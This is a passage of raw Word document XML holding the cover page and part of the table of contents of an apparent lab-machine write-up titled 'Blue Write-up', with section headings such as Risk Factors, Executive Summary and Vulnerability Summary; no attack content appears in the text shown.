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41D2B"/>
  <w:body>
    <w:p w14:paraId="1CE0D9E4" w14:textId="720C0A7E" w:rsidR="00BF3488" w:rsidRDefault="00724B6F" w:rsidP="00BF3488">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4E1F56" wp14:editId="0829D7A1">
            <wp:extent cx="6522720" cy="1417955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20380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94943" name="Picture 2038094943"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="8445" t="43117" r="6664" b="38426"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6522720" cy="1417955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631179E" w14:textId="77777777" w:rsidR="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00BF3488"/>
    <w:p w14:paraId="7AE36958" w14:textId="77777777" w:rsidR="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00BF3488"/>
    <w:p w14:paraId="0F2B0656" w14:textId="77777777" w:rsidR="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00BF3488"/>
    <w:p w14:paraId="073C61B2" w14:textId="2EE12C13" w:rsidR="00BF3488" w:rsidRDefault="00724B6F" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E9B8EC9" wp14:editId="4A212D50">
            <wp:extent cx="1805940" cy="1805940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="854190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9067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a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051E86F" w14:textId="267C86A7" w:rsidR="00724B6F" w:rsidRPr="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r w:rsidR="004B5302">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C99A3A" w14:textId="5D66EFD7" w:rsidR="00724B6F" w:rsidRPr="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine Author: </w:t>
      </w:r>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ch4p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53014B10" w14:textId="405D4ADC" w:rsidR="00724B6F" w:rsidRPr="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty: </w:t>
      </w:r>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C89B2" w14:textId="0E31E3E9" w:rsidR="00724B6F" w:rsidRDefault="00724B6F" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724B6F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Retired Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E58D2A" w14:textId="435020C7" w:rsidR="004B5302" w:rsidRPr="00724B6F" w:rsidRDefault="004B5302" w:rsidP="00724B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Prepared by: iamjirho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BE6A2" w14:textId="3437F994" w:rsidR="00724B6F" w:rsidRDefault="00724B6F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc169647973" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Century Gothic" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:id w:val="-2081829257"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7761EF6C" w14:textId="5A8BA2A2" w:rsidR="007742E2" w:rsidRPr="00BC4E50" w:rsidRDefault="007742E2" w:rsidP="00295A59">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BC4E50">
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="17148B2E" w14:textId="5B1BA9F7" w:rsidR="006528B5" w:rsidRDefault="00B94616" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc169647973" w:history="1">
            <w:r w:rsidR="006528B5" w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647973 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006528B5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A2C2726" w14:textId="7F0BFDDC" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647974" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Assessment Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647974 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AE6A290" w14:textId="298568DC" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647975" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding Severity Ratings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647975 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CF74C45" w14:textId="72C3F467" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647976" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Factors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647976 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1635EABB" w14:textId="7F84516B" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647977" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647977 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D7ABE7C" w14:textId="031557E5" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647978" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647978 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58EA5783" w14:textId="0C8FCC22" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647979" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647979 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="312C2CD5" w14:textId="518767D2" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647980" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647980 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06C0C4F8" w14:textId="64980B4B" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647981" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tester Notes and Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647981 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C510C8D" w14:textId="784C898E" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647982" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Key Strengths and Weaknesses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647982 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C5B4860" w14:textId="391AB67E" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647983" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Summary &amp; Report Card</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647983 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14F46BD6" w14:textId="038D902B" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
